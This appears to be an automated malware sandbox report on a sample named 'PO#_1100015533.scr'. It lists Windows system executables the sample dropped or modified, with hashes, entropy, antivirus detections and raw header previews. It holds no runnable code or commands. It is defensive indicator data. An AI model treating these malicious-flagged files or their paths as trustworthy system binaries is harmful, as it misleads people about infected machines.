                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........6..e..e..e.s.e..e.(.e..e.s.e..eI+.e..en*.e..eI+.e..eI+.e..eI+.e..e..e9.e.(.e..e.(.e..e.(.e..e.(.e..eRich..e........................PE..d...8..S..........#......"..."......@x.......................................................................................................!..........<....`..X.......................................................................p............................text...$ .......".................. ..`.data...p....@.......&..............@....pdata..X....`.......*..............@..@.rsrc....P.......@...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1168896
                                                                                                                                                                                                                                                                        Entropy (8bit):5.073885902574867
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:uQVuwSXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:uQtSsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:E77E152A4018445F2DBB4277C818FAEC
                                                                                                                                                                                                                                                                        SHA1:9676C6C89ACD9B8E04876562180375DBC9E9BF99
                                                                                                                                                                                                                                                                        SHA-256:F8108B687F25905A962E82B6F2F162CE1BE7B9651A3A7717ACAB501F902F72A0
                                                                                                                                                                                                                                                                        SHA-512:E48D2E83198DEA1E5DCD48A436416CA54AC707BC73D39377C53ED24FE695643A183599A74BD9D76F3628DE76E71D63B8459ABD0E11E13082187E4A55046A82F6
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x.m_<...<...<.......8.......>.......(.......0.......>..."..>.......=...<...........1.......-.......=.......=.......=...Rich<...........................PE..d...Wn.\.........."......\...8......0].........@.............................0......kQ.... .......... ..................................H...............|............................|..T...........................`|...............p...............................text....Z.......\.................. ..`.rdata...#...p...$...`..............@..@.data...x...........................@....pdata..............................@..@.rsrc...|...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1271808
                                                                                                                                                                                                                                                                        Entropy (8bit):5.149076303523621
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:lmEp99oXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tDosqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:42280A7385A4A80C419F1AB1581CB6BF
                                                                                                                                                                                                                                                                        SHA1:E13A0CAEF87F572243206792C87BB499DB341285
                                                                                                                                                                                                                                                                        SHA-256:DA36B82B72D6CEAEEBE7C156D87EA57F7A686226B2AB57C03A88FC3913AD094D
                                                                                                                                                                                                                                                                        SHA-512:F6761FDFF60E8B7B6FB0AA64BBF70872EB6E398297A935995C32F8DFF0FBFCF8F6A87E951948D3B5530641818CC35607171CBE16FB9869BE4DC33A9F2C22C7CD
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P..1.1.1.`FM..1.XP...1.cb..1..Q...1..Q.1..Q.1..Q...1.1..}1.`FH..1.XP...1.XP...1.XP.1.Rich.1.........PE..d....k.\.........."..........2.................@.....................................T.... .................................................<........P..l....@..h.......................T........................... ................................................text............................... ..`.rdata..............................@..@.data........ ......................@....pdata..h....@......................@..@.rsrc...l....P....... ..............@..@.reloc...P...`...@...(..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1188864
                                                                                                                                                                                                                                                                        Entropy (8bit):5.134607825048474
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:7RbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:lbsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:2B985C6626E556766B85A585B9413EE2
                                                                                                                                                                                                                                                                        SHA1:5EB1609A0AA4F9CEDD410F2B373555AC3E021D2D
                                                                                                                                                                                                                                                                        SHA-256:6022F566F604173DD13052B1A98A018BED3A205E0CB0AF23A8F870DF6AE8BD13
                                                                                                                                                                                                                                                                        SHA-512:D5D1D47AB2F4541AB8F37177863F9AA9CBC256083729A374A987FFF9AD0A0F19F8AB0FF177C8AFFFB2231AC8CFF660BEED98746C668F0A015FDD4C497C976340
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................e~.....B......e~.....e~.....e~............}......}......}.......}......}.....Rich...........................PE..L...C..S.....................................................................P.................. ..........................d...........<...........................................................(:..@............................................text...B........................... ..`.data...............................@....rsrc....P.......@..................@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1244672
                                                                                                                                                                                                                                                                        Entropy (8bit):5.184753131743034
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:f+u3TUppjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fTTUppjsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:94289130034BEC08E7DC23DD5DBDD4FB
                                                                                                                                                                                                                                                                        SHA1:6982DFF6EF94C31AE8DE75B1146FD960833A6AD6
                                                                                                                                                                                                                                                                        SHA-256:885EFB574B2673741C636743893344C46A532AA688923A59A763DEF8F3AEB617
                                                                                                                                                                                                                                                                        SHA-512:C483C7DF3A21A08B43C26FEE89782D835F53CAD0AA297F7BD2F9E511B5D9C0927B9D08E4C3FD540404A4B07615574FAF0BE92D21177266076DE45E485D488A11
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~KM..%...%...%.;h....%..~!...%..M....%.T.$...%.T.&...%.T. ...%.T.!...%...$.'.%.;h....%..~,...%..~....%..~'...%.Rich..%.................PE..L...ln.\.........."..........6.......R............@..........................0......].......................................`...........l...........................p...T..............................@...............\............................text............................... ..`.data...p...........................@....idata..............................@..@.rsrc...l...........................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PO#_1100015533.scr
                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1393664
                                                                                                                                                                                                                                                                        Entropy (8bit):5.416095657157234
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:WtzKePpWfsqjnhMgeiCl7G0nehbGZpbD:WtvPgDDmg27RnWGj
                                                                                                                                                                                                                                                                        MD5:DEA04FF3825A6416CBCDC2FF21C43332
                                                                                                                                                                                                                                                                        SHA1:C811EF7A420A6E461FBFAC8EB2E8910A6D49810C
                                                                                                                                                                                                                                                                        SHA-256:9862E937609111159BCBB8AB6F2246027F69B2FB1C9B3E25DABAF49833132488
                                                                                                                                                                                                                                                                        SHA-512:0B4A4AD7BECC87972A13B674A99D761728549A109C01664EEC7F639F7DBA74F8BB98D920FFA84D80E06B586AF0CA828034D652BC08B75B88969BA587B6482E36
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.H-#.&~#.&~#.&~*.~6.&~=.~'.&~*.~..&~*.~..&~.^K~!.&~.^]~,.&~#.'~..&~*.~3.&~=.~".&~#..~".&~*.~".&~Rich#.&~........PE..L...P..X.....................(.......z............@.................................[!.......................................}...........9..........................P................................<..@...............h............................text............................... ..`.rdata..L...........................@..@.data....:...........~..............@....rsrc....9.......:..................@..@.reloc...........p..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\68573a154f49b6de.bin

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):12320
                                                                                                                                                                                                                                                                        Entropy (8bit):7.984480176573596
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:WEUH/OzQ/DKyWgqA+yw0OEb5IZBWlmLYlhgnW3HCPZz:W1WzQ/+yCASIb2glmUlhKgCZ
                                                                                                                                                                                                                                                                        MD5:C2A75342C10932AA26F506050491DE3E
                                                                                                                                                                                                                                                                        SHA1:A871E0B256EEF10684DF60E64D7991DFCCE7C121
                                                                                                                                                                                                                                                                        SHA-256:ED506D7D5AE36844FA02A80D1282FD9C908644C69A07F332CF51AD599C9C70D3
                                                                                                                                                                                                                                                                        SHA-512:9EFA19D0258A2A61ADE677D22A09A40E3B58AC38CD8497A6E958431FB91E7257F8405F8B39F44A876CD80454AD12DFED8977DB7C788C7DE2F31C1B0332EC06D7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:w....#|....Y....U..6.O.>...c....g....J.D}".c.....di...<b.<...C..q.`0.co..*sd~......0.T.......O.@.Y.... }J-....}=..q>.~...Q..`pL....O..OU.....K$...DS..}....G.L.&.E.J..J...c..}.m#%p.>.d$...u...%..zr...#.!........_.Yz&U.+...z.H..N.3`T+....Z4....k3w..'....PBU..hvA.ZM..*?U..%...6..i*..@.J..#3.F.P...~......(R.@X..Y.h....;F....Gl-2J..X.j.ff.....R.^...9.#....l.a...7..JT.o#a\W......D.i ".#BM.mt....QR7.r[E...eCy.|...sY.:.tl.... D.JL.h...2...*..$E.....;........4.b(...y.)...30.J...,O......f.....%.51V..yR.X...g...rg.._.....1.g....\..L.......V...;V....G......[.."&R6.H,).....?/...d8h)7Z..\ .H...^[.zlF7I..&.*&/...Y.~.|..z....0`.1|..k.I.&\..Eu.....F..F...k0......".E..3...g..}7..dr...|K.....p...%N.>$...%%x}.....i..g.7..z....8G....e8.X.....M..;d..(r....}m.......$.n...g..g.a....m:.8...B.Z]k.aM`..<...qD....Y..+..i..S_8I.....S.v:......3.8..@..._..[0I....T.^.S.X.o..E..I.......S...6NI....%dFC....u...a....S.x..O.gg..'...Y.L...7k........[....b9?..9(.rC.K...Z..e...

                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\perfhost.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1150464
                                                                                                                                                                                                                                                                        Entropy (8bit):5.042604115032639
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:xXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:xsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:11D691ADAD67DBAC861DB2471CE9028B
                                                                                                                                                                                                                                                                        SHA1:3D200E9E2B4B1D97E98005CDE19222D291D14D2C
                                                                                                                                                                                                                                                                        SHA-256:BDB0B60449921F2D85F4FFBEBFCD18D654F3B60D84FE6EDBFC8C52353BE2B1C2
                                                                                                                                                                                                                                                                        SHA-512:C9DD2C19370CA316C2456345542536BEAB446772B12CB3E7FBAA73B458CC2B0A248ED1B6DA22D96775C92443B678268BFC9829B6C8553B9CB336BACCEDC5DF23
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........wL_..._..._...V..^...V..^..._.......V..@...V..F...V..^...V..^...Rich_...........PE..L.....[J..................... .......-.......@......................................x............ ..........................|2..@....P..............................................................(...@...p...t.......p............................text...&-.......................... ..`.data........@.......4..............@....rsrc........P.......6..............@..@.reloc...P...p...@...N..............@...o.[J......[J......[J......[J......[J......[J......[J(.....[JQ.....[Jz.....[J......[J......[J......[J......[J......[J......[J+.....[J......[JQ...........msvcrt.dll.ntdll.dll.RPCRT4.dll.API-MS-Win-Core-ErrorHandling-L1-1-0.dll.API-MS-Win-Core-Heap-L1-1-0.dll.API-MS-Win-Core-Interlocked-L1-1-0.dll.API-MS-Win-Core-LibraryLoader-L1-1-0.dll.API-MS-Win-Core-LocalRegistry-L1-1-0.dl

                                                                                                                                                                                                                                                                        C:\Windows\System32\FXSSVC.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1269760
                                                                                                                                                                                                                                                                        Entropy (8bit):7.275173371862657
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:olv3yIUPE1Bubmq3nT6j3xsqjnhMgeiCl7G0nehbGZpbD:olfyIUPE1BuB3uj1Dmg27RnWGj
                                                                                                                                                                                                                                                                        MD5:5F010917F62C2D56F7B242050E3524D7
                                                                                                                                                                                                                                                                        SHA1:E970CF52F85571FE1B307157B5AFCAAF3D162388
                                                                                                                                                                                                                                                                        SHA-256:B0B1BC4A81B9A1A1DB20D066239EBC33DE63A8D33567D4490A9A206752AF5542
                                                                                                                                                                                                                                                                        SHA-512:CFF70D81F01079F050B0CD84F914888F05553B66E0CFFFB037C560FD13E7798F55FFFCEC346E42D2ED68B313D39D5E1F3A6725AA1B0ACC5B45BE1005EDB4C07D
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.>e>gP6>gP6>gP67..6<gP67..6.gP6>gQ6.fP67..6*gP67..6.gP67..64gP67..6?gP67..6?gP6Rich>gP6................PE..d...9..L.........."............................@.....................................?.........................................................h............P..T?...................................................................................................text............................... ..`.data....c.......X..................@....pdata..T?...P...@...$..............@..@.rsrc................d..............@..@.reloc...............p..............@...U..L.......L....@..L.......L.......L....7..L.......L.......L.......L....n..L.......L....Q..L....8..L!......L....,..L9...0..LC......LP...O..L\...M..Lh...r..Ls......L............ADVAPI32.dll.ntdll.DLL.pcwum.DLL.KERNEL32.dll.msvcrt.dll.VERSION.dll.SHLWAPI.dll.RPCRT4.dll.TAPI32.dll.GDI32.dll.WINSPOOL.DRV.US

                                                                                                                                                                                                                                                                        C:\Windows\System32\Locator.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1140224
                                                                                                                                                                                                                                                                        Entropy (8bit):5.021997397935296
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:AXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:AsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:860030B06B83DAD907D4E0801AB228F9
                                                                                                                                                                                                                                                                        SHA1:2E19913DAFBD66972D02A86A206ED4A3B8AF956B
                                                                                                                                                                                                                                                                        SHA-256:210B59285CAB4C5C6A686529C7510A752D9DE5DC27C4792D57BFE1C2C38C28FD
                                                                                                                                                                                                                                                                        SHA-512:7CF199F378DFD48F5E83241CA3F119D4216FD1EFEBFB070E555B988261799E9FA91C6DCF4EC0FDF9C23F1C314E4A0B5977DAAF1CB3726E3C866998032864F8D6
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l_.............f.......f...............f.......f.......f.......f.......f......Rich....................PE..d...Q.[J..........".................<...............................................;................ ...............................................P.......@..........................................................................p............................text............................... ..`.data...P....0......................@....pdata.......@......................@..@.rsrc........P......................@..@.reloc...P...`...@...&..............@....[Jx...+.[J....+.[J....^.[J....^.[J......[J......[J......[J'.....[JG...+.[J......[Jq...+.[J......[J......[J............msvcrt.dll.NTDLL.DLL.API-MS-WIN-Service-Core-L1-1-0.dll.API-MS-WIN-Service-winsvc-L1-1-0.dll.API-MS-Win-Core-ErrorHandling-L1-1-0.dll.API-MS-Win-Core-LibraryLoader-L1-1-0.dll.API-MS-Wi

                                                                                                                                                                                                                                                                        C:\Windows\System32\Msdtc\Trace\dtctrace.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                                                                                        Entropy (8bit):0.28874895406702894
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:/OCwwtvU07qF69Fq5C1Ci6CzE5Z2+fqjF+:/nvj1V1CYiY+fC+
                                                                                                                                                                                                                                                                        MD5:87F084D1898916B40A76012B21004344
                                                                                                                                                                                                                                                                        SHA1:4CDD88DF7D3D8C1945F859A2E354706AA7053109
                                                                                                                                                                                                                                                                        SHA-256:43027569DE24ABF804F16169A6C10D47C764B582A121EBA7B09AE1A6BB21D3B7
                                                                                                                                                                                                                                                                        SHA-512:05529612F10578CA033AF43E71FAAEF55CAD0EC11E38B50053CD752DFEF282AF5FBB379D69EF9E348B80A85AC9EB2448AA6CB25B91E9ECE86828ADFD19FF1F30
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.@......................................................................................................@......................aa..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................9.mr.... .....i...Dg..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\System32\SearchIndexer.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                        Size (bytes):1173504
                                                                                                                                                                                                                                                                        Entropy (8bit):7.174550319438343
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:T9Bcju8+g/Gb4uvsqjnhMgeiCl7G0nehbGZpbD:TQStg/Gb4IDmg27RnWGj
                                                                                                                                                                                                                                                                        MD5:ECBEF93CBFE0A545B71C5ACFA746DA04
                                                                                                                                                                                                                                                                        SHA1:D38E74B5DCEC8F406DBFF8B575E63431785D39E6
                                                                                                                                                                                                                                                                        SHA-256:DBF672EB722F258F3C067D5FF26226E098248C3CC02E19EDF63C5B531BAEAD16
                                                                                                                                                                                                                                                                        SHA-512:D3D374AB6C39264A64E05F0A9FB847E39113A063FE5FB6AD94B95A05023C0C67150CF255D09CCBC4CBAFE90790CE01FBA729A3AFED841A3BA21E7261FA63CA80
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g~.F...F...F...O~..D...O~..O...O~..]...F...1...O~..^...O~......O~..G...O~..G...RichF...........................PE..d......M.........."..............................................................................................................................................m......................8...................................................t........................text............................... ..`.rdata..............................@..@.data...$(.......&..................@....pdata...m.......n..................@..@.rsrc................h..............@..@.reloc..............................@......Mx...2..M....%..M....2..M.......M.......M....2..M....2..M....%..M....)..M....z..M....Y..M.......M.......M............ADVAPI32.dll.ntdll.DLL.KERNEL32.dll.USER32.dll.msvcrt.dll.ole32.dll.OLEAUT32.dll.TQUERY.DLL.SHLWAPI.dll.MSSRCH.DLL.IMM32.dll............

                                                                                                                                                                                                                                                                        C:\Windows\System32\VSSVC.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2180096
                                                                                                                                                                                                                                                                        Entropy (8bit):6.68959938174692
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:f4W+J/pHuR7n20mT4FE2LnhUxfpDmg27RnWGj:A/xBD527BWG
                                                                                                                                                                                                                                                                        MD5:A1875BAA876312B1459A9716A68C85CD
                                                                                                                                                                                                                                                                        SHA1:684EE9B52DF6AED35EC3DA9E9195B63855DA9ABE
                                                                                                                                                                                                                                                                        SHA-256:EB9509911AEBA5AF68F9CF7333A93A43AD5878E458FE5C0781921E8B566E4B71
                                                                                                                                                                                                                                                                        SHA-512:BFB8B5A7288963F3F335FAC03E13876246D7ADE9B5D376D951403EE73FC164F06B2452F52D07B3ADF5C5AA2D05982B360BDBC52D312FFD2735FBEE30E40694B3
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......69..rXj.rXj.rXj.{ ..pXj.{ ..[Xj.rXk..Yj.{ .nXj.{ ...Xj.{ .~Xj.{ ..sXj.{ ..sXj.RichrXj.........PE..d......L.........."......F...,................................................!......,".............. .......................................-.......@...N..............................................................................`............................text...PD.......F.................. ..`.data...(!...`.......L..............@....pdata...............b..............@..@.rsrc....N...@...P..................@..@.reloc...............T..............@...U..L.......L.......L.......L.......L....7..L.......L....h..L....,..L.......L$...0..L0...n..L=......L.......LH......LS......L`...i..Lk......Lv...q..L....3..L.......L.......L....\..L.......L.......L.......L............ADVAPI32.dll.ntdll.DLL.KERNEL32.dll.USER32.dll.msvcrt.dll.ATL.DLL.ole32.dll.SHLWAPI.dll.OLEAUT32

                                                                                                                                                                                                                                                                        C:\Windows\System32\alg.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PO#_1100015533.scr
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                        Size (bytes):1208832
                                                                                                                                                                                                                                                                        Entropy (8bit):5.143592469869781
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:GLWvXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:GLWvsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:194D43897AB889D24B26961F99059037
                                                                                                                                                                                                                                                                        SHA1:729C6238CE9D8440036A33DDAB9FF7EB8E3044C8
                                                                                                                                                                                                                                                                        SHA-256:A811040C351FE4EFB7556F1DAEE063B462DCDF18F6C424500F2EE2BFEB9939DA
                                                                                                                                                                                                                                                                        SHA-512:07ED821429D0E6891E4F9804F9BD547D84CC9D2578F664C79BBD855B377F29F68317673815DA1E8798E7BE6A7041D1EA0DDC0EC5B2A52CB046382C22DC2DC2C3
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I..&.dxu.dxu.dxu...u.dxu...u.dxu...u.dxu.dyuudxu...u.dxu...u.dxu...u.dxu...u.dxuRich.dxu........................PE..d.....[J.........."..........D......................................................oC............... ......................................,........0....... ......................P................................................................................text............................... ..`.data...............................@....pdata....... ......................@..@.rsrc........0... ..................@..@.reloc...P...P...@...2..............@...k.[Jh.....[Ju...+.[J......[J....+.[J....p.[J......[J......[J......[J....+.[J......[J......[J............ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.msvcrt.dll.ATL.DLL.WS2_32.dll.ole32.dll.OLEAUT32.dll.WSOCK32.dll.MSWSOCK.DLL................................................................................

                                                                                                                                                                                                                                                                        C:\Windows\System32\dllhost.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1139712
                                                                                                                                                                                                                                                                        Entropy (8bit):5.015874053373207
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:CXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:CsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:B179AD817685558FDF4973AE5B64DD19
                                                                                                                                                                                                                                                                        SHA1:02791927C5452CE6DCB94C0A4E8C72A33A5B62CB
                                                                                                                                                                                                                                                                        SHA-256:20CE616880E8AB0914F0656A08FDC4FD0F8988B030AD10A5452C7369A9754EBF
                                                                                                                                                                                                                                                                        SHA-512:B6EBA12EC6C77D1446C026835BFCFCEB72B6E87AC0F6D798406476734AE5B750AAE3B3975F8415FC64D47F2DF0385F0BBB37AC393BA7A1703C6A1751F0A58C9B
                                                                                                                                                                                                                                                                        Malicious:true
